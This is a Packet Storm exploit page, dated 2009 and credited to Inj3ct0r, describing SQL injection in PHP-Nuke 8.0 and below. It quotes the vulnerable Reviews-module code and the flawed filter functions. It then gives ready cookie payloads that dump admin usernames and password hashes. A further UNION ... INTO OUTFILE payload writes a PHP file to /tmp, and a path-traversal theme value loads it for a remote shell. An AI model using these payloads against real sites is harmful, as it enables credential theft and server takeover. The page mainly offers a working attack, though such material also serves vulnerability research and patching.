what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-Nuke 8.0 SQL Injection / Remote Shell

PHP-Nuke 8.0 SQL Injection / Remote Shell
Posted Sep 1, 2009
Authored by Inj3ct0r | Site Inj3ct0r.com

PHP-Nuke versions 8.0 and below suffers from a remote SQL injection vulnerability that allows for remote command execution.

tags | exploit, remote, php, sql injection
SHA-256 | 5418f2d503edad71765e42389d861d50930f319fcd2ce6be180d1381256530e8

PHP-Nuke 8.0 SQL Injection / Remote Shell

Change Mirror Download
====================================
PHP-Nuke <= 8.0 SQL-Inj3ct0r Exploit
====================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com


Product: PHP-Nuke
Version: 8.0
site: rus-phpnuke.com

/modules/Reviews/index.php

Vulnerable code:


$uname = filter($cookie[1], "nohtml");
$id = intval($id);
$score = intval($score);
if (is_user($user)) {
$krow = $db->sql_fetchrow($db->sql_query("SELECT karma FROM ".$user_prefix."_users WHERE username='$uname'"));
if ($krow['karma'] == 2) {
$db->sql_query("insert into ".$prefix."_reviews_comments_moderated values (NULL, '$id', '$uname', now(), '$comments', '$score')");
include("header.php");
title(""._MODERATEDTITLE."");
OpenTable();
echo "<center>"._COMMENTMODERATED."";
echo "<br><br><a href=\"modules.php?name=$module_name&rop=showcontent&id=$id\">"._MODERATEDTITLE."</a>";
CloseTable();
include("footer.php");
die();
} elseif ($krow['karma'] == 3) {
Header("Location: modules.php?name=$module_name&rop=showcontent&id=$id");
die();
}
}
$db->sql_query("insert into ".$prefix."_reviews_comments values (NULL, '$id', '$uname', now(), '$comments', '$score')");


------------------------

Here there once 2 sql-inj3ct0r, to select and insert queries, after raskadirovki Cookie is sleshirovanie data, but in this code snippet, data from $ cookie [1] fall into the filter

------------------------

function filter($what, $strip="", $save="", $type="") {
if ($strip == "nohtml") {
$what = check_html($what, $strip);
// $what = htmlentities(trim($what), ENT_QUOTES);
// If the variable $what doesn't comes from a preview screen should be converted
if ($type != "preview" AND $save != 1) {
$what = html_entity_decode($what, ENT_QUOTES);
}
}
if ($save == 1) {
$what = check_words($what);
$what = check_html($what, $strip);
if (!get_magic_quotes_gpc()) {
$what = addslashes($what);
}
} else {
$what = stripslashes(FixQuotes($what,$strip));
$what = check_words($what);
$what = check_html($what, $strip);
}
return($what);
}

-------------------------------

and thence to filter check_html

-------------------------------


function check_html ($str, $strip="") {
/* The core of this code has been lifted from phpslash */
/* which is licenced under the GPL. */
include("config.php");
if ($strip == "nohtml")
$AllowableHTML=array('');
$str = stripslashes($str);
$str = eregi_replace("<[[:space:]]*([^>]*)[[:space:]]*>",'<\\1>', $str);
// Delete all spaces from html tags .
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?[[:space:]]*([^\" >]*)[[:space:]]*\"?[^>]*>",'<a href="\\1">', $str);
// Delete all attribs from Anchor, except an href, double quoted.
$str = eregi_replace("<[[:space:]]* img[[:space:]]*([^>]*)[[:space:]]*>", '', $str);
// Delete all img tags
$str = eregi_replace("<a[^>]*href[[:space:]]*=[[:space:]]*\"?javascript[[:punct:]]*\"?[^>]*>", '', $str);
// Delete javascript code from a href tags -- Zhen-Xjell @ http://nukecops.com
$tmp = "";
while (ereg("<(/?[[:alpha:]]*)[[:space:]]*([^>]*)>",$str,$reg)) {
$i = strpos($str,$reg[0]);
$l = strlen($reg[0]);
if ($reg[1][0] == "/") $tag = strtolower(substr($reg[1],1));
else $tag = strtolower($reg[1]);
if ($a = $AllowableHTML[$tag])
if ($reg[1][0] == "/") $tag = "</$tag>";
elseif (($a == 1) || ($reg[2] == "")) $tag = "<$tag>";
else {
# Place here the double quote fix function.
$attrb_list=delQuotes($reg[2]);
// A VER
//$attrb_list = ereg_replace("&","&",$attrb_list);
$tag = "<$tag" . $attrb_list . ">";
} # Attribs in tag allowed
else $tag = "";
$tmp .= substr($str,0,$i) . $tag;
$str = substr($str,$i+$l);
}
$str = $tmp . $str;
return $str;
exit;
/* Squash PHP tags unconditionally */
$str = ereg_replace("<\?","",$str);
return $str;
}


where shielding escaped successfully removed, so it becomes possible to implement our sql code, through the cheekbones to select the data output can not, therefore, used inj3ct0r to insert
Come in

/modules.php?name=Reviews&rop=showcontent&id=1

choose any review, click "Insert comment"
throw in a cookie

base64_encode(yourid:yournick',1,(select concat(aid,0x3a,pwd) from nuke_authors),3)/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)

Click submit, as a result we get the login: hash admin

But over the cheekbones to select when file_priv can fill shell, throw in a cookie:

base64_encode(yourid:yournick' union select 0x3c3f20706870696e666f28293b203f3e into outfile '/tmp/theme.php'/*:yourhash:10:thread:1:0:0:0:RusNuke2003:4096)


Then the path can not disclose, pour in tmp, and then simply poured through the shell templetes, for this go to /modules.php?Name=Your_Account&op=chgtheme

Human SORS, where it is written the name of the topic, in my case, value = RusNuke2003 write:

<option value="/../../../../../../../tmp/" >RusNuke2003

save, get shell =))


----------------------------------------------

ThE End =] Visit my proj3ct :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~ - [ [ : Inj3ct0r : ] ]
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close